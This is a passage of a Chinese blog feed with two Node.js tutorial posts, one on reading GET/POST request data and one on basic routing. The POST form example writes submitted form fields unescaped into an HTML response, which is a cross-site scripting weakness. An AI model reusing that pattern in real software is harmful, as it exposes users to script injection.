href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong> 然后查看返回结果:<br><img src="https://img-blog.csdnimg.cn/2020031916531559.jpg" alt="在这里插入图片描述"><br>第二次访问可能会出现乱码,在第二部分代码中<code>res.writeHead</code>语句改写为<code>(200, {'Content-Type': 'text/plain'}); </code>即可。乱码问题出现有时候都不知道自己到底漏了啥,好在也不是啥大问题<br>注意看第一次访问 <strong><a href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong> 的结果中<em>query</em>的值,在使用 url.parse 方法来解析 URL 中的参数时,对象就是它。</p><h2 id="获取-POST-请求内容"><a href="#获取-POST-请求内容" class="headerlink" title="获取 POST 请求内容"></a>获取 POST 请求内容</h2><p>POST 请求的内容全部的都在请求体中,http.ServerRequest 并没有一个属性内容为请求体,因为等待请求体和解析请求体费时间。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//基本语法结构说明</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> querystring = <span class="built_in">require</span>(<span class="string">'querystring'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> <span class="comment">// 定义了一个post变量,用于暂存请求体的信息</span></span><br><span class="line"> <span class="keyword">var</span> post = <span class="string">''</span>; </span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 通过req的data事件监听函数,每当接受到请求体的数据,就累加到post变量中</span></span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'data'</span>, <span class="keyword">function</span>(<span class="params">chunk</span>){ </span><br><span class="line"> post += chunk;</span><br><span class="line"> });</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 在end事件触发后,通过querystring.parse将post解析为真正的POST请求格式,然后向客户端返回。</span></span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'end'</span>, <span class="keyword">function</span>(<span class="params"></span>){ </span><br><span class="line"> post = querystring.<span class="title function_">parse</span>(post);</span><br><span class="line"> res.<span class="title function_">end</span>(util.<span class="title function_">inspect</span>(post));</span><br><span class="line"> });</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>以下实例表单通过 POST 提交并输出数据:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> querystring = <span class="built_in">require</span>(<span class="string">'querystring'</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> postHTML = </span><br><span class="line"> <span class="string">'<html><head><meta charset="utf-8"><title>菜鸟教程 Node.js 实例</title></head>'</span> +</span><br><span class="line"> <span class="string">'<body>'</span> +</span><br><span class="line"> <span class="string">'<form method="post">'</span> +</span><br><span class="line"> <span class="string">'网站名: <input name="name"><br>'</span> +</span><br><span class="line"> <span class="string">'网站 URL: <input name="url"><br>'</span> +</span><br><span class="line"> <span class="string">'<input type="submit">'</span> +</span><br><span class="line"> <span class="string">'</form>'</span> +</span><br><span class="line"> <span class="string">'</body></html>'</span>;</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="keyword">var</span> body = <span class="string">""</span>;</span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'data'</span>, <span class="keyword">function</span> (<span class="params">chunk</span>) {</span><br><span class="line"> body += chunk;</span><br><span class="line"> });</span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'end'</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> <span class="comment">// 解析参数</span></span><br><span class="line"> body = querystring.<span class="title function_">parse</span>(body);</span><br><span class="line"> <span class="comment">// 设置响应头部信息及编码</span></span><br><span class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/html; charset=utf8'</span>});</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(body.<span class="property">name</span> && body.<span class="property">url</span>) { <span class="comment">// 输出提交的数据</span></span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站名:"</span> + body.<span class="property">name</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"<br>"</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站 URL:"</span> + body.<span class="property">url</span>);</span><br><span class="line"> } <span class="keyword">else</span> { <span class="comment">// 输出表单</span></span><br><span class="line"> res.<span class="title function_">write</span>(postHTML);</span><br><span class="line"> }</span><br><span class="line"> res.<span class="title function_">end</span>();</span><br><span class="line"> });</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>执行结果 Gif 演示:<br><img src="https://img-blog.csdnimg.cn/20200319170115910.gif" alt="在这里插入图片描述"><br>因为if语句的原因,如果闭的网站名和URL没都输入,例如只输入了一行,页面就会刷新成最开始的样子。GIF图我就不放了,毕竟动手才能快乐嘛(绝不是因为我懒)</p><p>本篇博客是参考[Node.js菜鸟教程]<a href="https://www.runoob.com/nodejs/node-js-get-post.html)%EF%BC%8C%E8%AF%A6%E6%83%85%E5%8F%AF%E8%B7%B3%E8%87%B3[%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B](https://www.runoob.com/nodejs/node-js-get-post.html)%E3%80%82">https://www.runoob.com/nodejs/node-js-get-post.html),详情可跳至[菜鸟教程](https://www.runoob.com/nodejs/node-js-get-post.html)。</a></p><hr><p>后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><p>表单提交到服务器一般都使用 GET&#x2F;POST 请求。</p>
<h2 id="获取GET请求内容"><a href="#获取GET请求内容" class="headerlink" title="获取GET请求内容"></a>获取GET请求内容</h2><p>由于G</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>路由</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94%E8%B7%AF%E7%94%B1/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94%E8%B7%AF%E7%94%B1/</id>
<published>2020-03-19T10:36:54.000Z</published>
<updated>2022-03-18T06:03:46.017Z</updated>
<content type="html"><![CDATA[<p>我们要为路由提供请求的 URL 和其他需要的 GET 及 POST 参数,随后路由需要根据这些数据来执行相应的代码。</p><p>因此,我们需要查看 HTTP 请求,从中提取出请求的 URL 以及 GET/POST 参数。这一功能暂定为我们的HTTP服务器的功能。</p><p>我们需要的所有数据都会包含在 request 对象中,该对象作为 onRequest() 回调函数的第一个参数传递。但是为了解析这些数据,我们需要额外的 Node.JS 模块,它们分别是 url 和 querystring 模块。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> url.<span class="title function_">parse</span>(string).<span class="property">query</span></span><br><span class="line"> |</span><br><span class="line"> url.<span class="title function_">parse</span>(string).<span class="property">pathname</span> |</span><br><span class="line"> | |</span><br><span class="line"> | |</span><br><span class="line"> ------ -------------------</span><br><span class="line"><span class="attr">http</span>:<span class="comment">//localhost:8888/start?foo=bar&hello=world</span></span><br><span class="line"> --- -----</span><br><span class="line"> | |</span><br><span class="line"> | |</span><br><span class="line"> querystring.<span class="title function_">parse</span>(queryString)[<span class="string">"foo"</span>] |</span><br><span class="line"> |</span><br><span class="line"> querystring.<span class="title function_">parse</span>(queryString)[<span class="string">"hello"</span></span><br></pre></td></tr></table></figure><p>也可以用 querystring 模块来解析 POST 请求体中的参数,稍后会有演示。<br>现在我们来给 onRequest() 函数加上一些逻辑,用来找出浏览器请求的 URL 路径:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//server.js</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">"http"</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">"url"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">start</span>(<span class="params"></span>) {</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">onRequest</span>(<span class="params">request, response</span>) {</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(request.<span class="property">url</span>).<span class="property">pathname</span>;</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Request for "</span> + pathname + <span class="string">" received."</span>);</span><br><span class="line"> response.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">"Content-Type"</span>: <span class="string">"text/plain"</span>});</span><br><span class="line"> response.<span class="title function_">write</span>(<span class="string">"Hello World"</span>);</span><br><span class="line"> response.<span class="title function_">end</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> http.<span class="title function_">createServer</span>(onRequest).<span class="title function_">listen</span>(<span class="number">8888</span>);</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Server has started."</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">start</span> = start;</span><br></pre></td></tr></table></figure><p>应用现在可以通过请求的 URL 路径来区别不同请求了–这使我们得以使用路由(还未完成)来将请求以 URL 路径为基准映射到处理程序上。<br>在我们所要构建的应用中,这意味着来自 /start 和 /upload 的请求可以使用不同的代码来处理。稍后我们将看到这些内容是如何整合到一起的。</p><p>现在我们可以来编写路由了,建立一个名为 router.js 的文件,添加以下内容:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//router.js</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">route</span>(<span class="params">pathname</span>) {</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"About to route a request for "</span> + pathname);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">route</span> = route;</span><br></pre></td></tr></table></figure><p>上面代码确实啥也没干……,不过现在重点是如何把路由和服务器整合起来。在这里不推荐通过硬编码的方式将这一依赖项绑定到服务器上,使用依赖注入的方式较松散地添加路由模块的方法更为广泛<br>首先,我们来扩展一下服务器的 start() 函数,以便将路由函数作为参数传递过去,server.js 文件代码如下:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//server.js</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">"http"</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">"url"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">start</span>(<span class="params">route</span>) {</span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">onRequest</span>(<span class="params">request, response</span>) {</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(request.<span class="property">url</span>).<span class="property">pathname</span>;</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Request for "</span> + pathname + <span class="string">" received."</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="title function_">route</span>(pathname);</span><br><span class="line"> </span><br><span class="line"> response.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">"Content-Type"</span>: <span class="string">"text/plain"</span>});</span><br><span class="line"> response.<span class="title function_">write</span>(<span class="string">"Hello World"</span>);</span><br><span class="line"> response.<span class="title function_">end</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> http.<span class="title function_">createServer</span>(onRequest).<span class="title function_">listen</span>(<span class="number">8888</span>);</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"Server has started."</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="built_in">exports</span>.<span class="property">start</span> = start;</span><br></pre></td></tr></table></figure><p>同时,我们会相应扩展 index.js,使得路由函数可以被注入到服务器中:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.js</span></span><br><span class="line"><span class="keyword">var</span> server = <span class="built_in">require</span>(<span class="string">"./server"</span>);</span><br><span class="line"><span class="keyword">var</span> router = <span class="built_in">require</span>(<span class="string">"./router"</span>);</span><br><span class="line"> </span><br><span class="line">server.<span class="title function_">start</span>(router.<span class="property">route</span>);</span><br></pre></td></tr></table></figure><ul><li>此时传递的函数依旧啥也没干<br>如果现在启动应用(node index.js,始终记得这个命令行),随后请求一个URL,你将会看到应用输出相应的信息,这表明我们的HTTP服务器已经在使用路由模块了,并会将请求的路径传递给路由:</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node index.<span class="property">js</span></span><br><span class="line"><span class="title class_">Server</span> has started.</span><br></pre></td></tr></table></figure><p>浏览器访问 <a href="http://127.0.0.1:8888/%EF%BC%8C%E8%BE%93%E5%87%BA%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B">http://127.0.0.1:8888/,输出结果如下</a><br><img src="https://img-blog.csdnimg.cn/20200319164641372.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>本篇博客是参考<a href="https://www.runoob.com/nodejs/nodejs-router.html">Node.js菜鸟教程</a>,详情可跳至<a href="https://www.runoob.com/nodejs/nodejs-router.html">菜鸟教程</a>。</p><hr><p>后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><p>我们要为路由提供请求的 URL 和其他需要的 GET 及 POST 参数,随后路由需要根据这些数据来执行相应的代码。</p>
<p>因此,我们需要查看 HTTP 请求,从中提取出请求的 URL 以及 GET&#x2F;POST 参数。这一功能暂定为我们的HTTP服务器的功能</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
</feed>